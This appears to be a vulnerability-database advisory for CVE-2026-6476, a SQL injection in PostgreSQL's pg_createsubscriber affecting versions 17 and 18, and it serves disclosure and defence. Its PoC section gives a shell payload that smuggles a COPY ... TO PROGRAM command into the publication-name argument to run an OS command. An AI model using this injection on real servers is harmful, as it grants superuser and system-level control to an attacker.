Security Vulnerability Report
CVE-2026-6476 CVSS 7.2 HIGH

Published: 2026-05-14 14:16:25
Last Modified: 2026-05-14 16:21:23
Source: f86ef6dc-4d3a-42ad-8f28-e6d5547a5007

Description

SQL injection in PostgreSQL pg_createsubscriber allows an attacker with pg_create_subscription rights to execute arbitrary SQL as a superuser. The attack takes effect when pg_createsubscriber next runs. Within major versions 17 and 18, minor versions before PostgreSQL 18.4 and 17.10 are affected. Versions before PostgreSQL 17 are unaffected.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available in the record; the affected versions below are taken from the description (fixed in 17.10 and 18.4).

PostgreSQL 17 < 17.10
PostgreSQL 18 < 18.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
shell
# Conceptual PoC for CVE-2026-6476
# The attacker needs pg_create_subscription privileges.
# The vulnerability triggers when pg_createsubscriber runs.

# 1. Attacker prepares malicious SQL payload
# This payload attempts to create a superuser or execute OS commands.
# Example payload injection into a vulnerable parameter (e.g., publication name).
MALICIOUS_PAYLOAD="'; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'; --"

# 2. Execution scenario
# When an administrator or the system runs pg_createsubscriber with the crafted input:
# /usr/bin/pg_createsubscriber -d postgres -p 5432 -U attacker --publication="${MALICIOUS_PAYLOAD}"

# 3. Result
# The injected SQL is executed with superuser privileges, creating the file /tmp/pwned.
# This confirms arbitrary SQL execution capability.

References

https://www.postgresql.org/support/security/CVE-2026-6476/

Weakness: CWE-89 (SQL Injection)
Status: Undergoing Analysis